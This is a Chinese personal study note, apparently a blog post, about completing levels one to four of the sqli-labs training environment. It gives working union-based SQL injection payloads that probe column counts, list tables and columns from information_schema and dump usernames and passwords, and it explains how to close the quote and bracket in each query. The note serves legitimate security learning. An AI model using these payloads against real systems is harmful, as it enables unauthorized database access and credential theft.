写给自己看——记录自己sql注入的学习

本地sqlilabs搭建
第一关,第二关简单的两个sql注入,字符型和数字型注入,直接判断爆出数据库security
order by 一直到3过后不产生回显

?id=-1' union select 1,2, table_name from information_schema.tables where table_schema = database() --+

这样只能爆出第一个table,后续table可以通过limit进行爆出

?id=-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema = database() --+

通过group_concat可以直接将所有表爆出,找出最可疑的user表进行爆列

?id=-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name = ‘user’ --+

直接采用同样方法,前面id=-1其实可以用其他不成立的代替一下,如id=999这样可以使得后面联合查询union select执行。最后就是一个简单的数据查询

?id=-1' union select 1, 2, group_concat(username,0x3a,password) from user --+

之前爆出username和password两个column这里可以直接进行查询
数字型注入可以不用加后面–+这个,因为查询语句中不包含‘所以可以不用注释

然后在sql中#和–+都是注释语句,但是#在url中需要编码为%2以避免与url本身的锚点冲突。

在我测试的时候也是发现#不行所以选择–+,+号在sql语句中好像会被转换为空格,所以有时候提示报错的时候你会看见你输入的是–+但是最后的报错语句只有–

第三关也是一个简单的注入但是这里的

id=(’$id’)

在这里插入图片描述

构造一个简单闭合就可以?id=1') order by 3 --+这个时候对应的sql语句是

select * from users where id=('1') order by 3 --+') limit 0,1

由于后面的直接被注释掉了所以只执行前面语句,如果你?id=1 order by 3 --+或者其他的,sql语句没有进行闭合。

但是?id=1 order by 3 --+时有回显但是无报错?id=1' order by 3 --+时报错
在这里插入图片描述在这里插入图片描述
本地环境测试发先('可以直接不用闭合,但是理论上是需要闭合的,但是('1’这个不进行闭合就报错。select * from users where id=('1 order by 3 --+ ') limit 0,1;在这个字符串中#被进行转义。

第四关采用双引号闭合id=1")即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值